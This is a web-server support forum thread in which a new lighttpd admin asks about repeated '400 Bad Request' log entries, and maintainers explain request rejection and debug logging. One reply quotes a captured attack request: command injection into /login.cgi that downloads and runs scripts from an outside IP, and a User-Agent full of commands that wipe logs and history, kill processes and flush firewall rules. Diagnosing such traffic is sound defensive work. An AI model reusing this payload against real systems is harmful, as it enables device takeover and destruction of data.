Blocking bad requests (spam I guess or something else)
Added by MapHtH over 4 years ago
Hi guys,
could anyone help me to block requests like:
156.198.161.145 - - [03/Nov/2019:12:07:50 +0100] " " 400 345 "-" "-"
156.196.25.3 - - [03/Nov/2019:12:13:17 +0100] " " 400 345 "-" "-"
I've tried with adding this to conf, but it still doesn't filter them out:
$HTTP["request-method"] !~ "^(GET|POST|HEAD)$" { url.access-deny = ( "" ) accesslog.filename = "/tmp/lighttpd/spam.log" }
Those requests are repeating every few minutes of the day, and I have no idea what they are. I'm a bit new to lighttpd and web servers so if anyone knows what this is, please tell me. All the IPs are from Egypt.
Thanks
Replies (5)
RE: Blocking bad requests (spam I guess or something else) - Added by stbuehler over 4 years ago
Hi,
to me the access log looks like they are already "blocked" - with a "400 Bad Request" response. Of course theoretically a "400" response can also be sent by a backend, but then the log should at least contain a valid request path.
RE: Blocking bad requests (spam I guess or something else) - Added by gstrauss over 4 years ago
Bad requests are rejected early in request processing, before any conditional config processing. To be more direct, if an HTTP request is rejected due to parsing errors, lighttpd skips conditional config processing, such as $HTTP["request-method"], since even that might not be valid. The configuration in the global scope is used, including for logging.
To see what these requests are, you can set debug.log-request-header-on-error = "enable" in the global scope, and then restart lighttpd. If you get these requests every few minutes, then you'll have your answer in the lighttpd error log after a few minutes, and then you should probably disable the debugging and restart lighttpd again.
If you have a (small) set of IPs which only send bad requests (and do not send any valid requests), you might consider blocking them in your firewall. However, for a few bad requests every few minutes, I would suggest ignoring the "problem", and perhaps filtering them out of your logs when doing log analysis. After all, that's what you are attempting to do above to prevent them from getting into your other access log(s).
RE: Blocking bad requests (spam I guess or something else) - Added by MapHtH over 4 years ago
Thanks for the tips.
I've enabled the debug and its the same for every entry:
197.57.32.123 - - [03/Nov/2019:21:20:00 +0100] " " 400 345 "-" "-"
and the debug log shows this:
2019-11-03 21:20:00: (request.c.407) overlong request line; extra space -> 400
2019-11-03 21:20:00: (connections.c.794) request-header:\nGET /login.cgi?cli=aa ;wget http://157.245.173.210/824982536/dlink -O /tmp/cc ;sh /tmp/cc ;wget http://157.245.173.210/824982536/dlink2 -O /tmp/dd ;sh /tmp/dd HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Nakuma;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;\r\n\r\n
Is this some sort of a probing attack? It looks like someone is trying to push commands, or am I worng?
RE: Blocking bad requests (spam I guess or something else) - Added by gstrauss over 4 years ago
It is not a probe. It is a script-kiddie attack. Congratulations, you're the first one on the internet to see it. (jk. no you're not)
RE: Blocking bad requests (spam I guess or something else) - Added by MapHtH over 4 years ago
Oh, thanks for the info.
I'm new to running a web server.
I'll look into what I can do to stop this since it is slightly annoying. Since it seems that all the requests come from egypt, I'll try blocking the country :P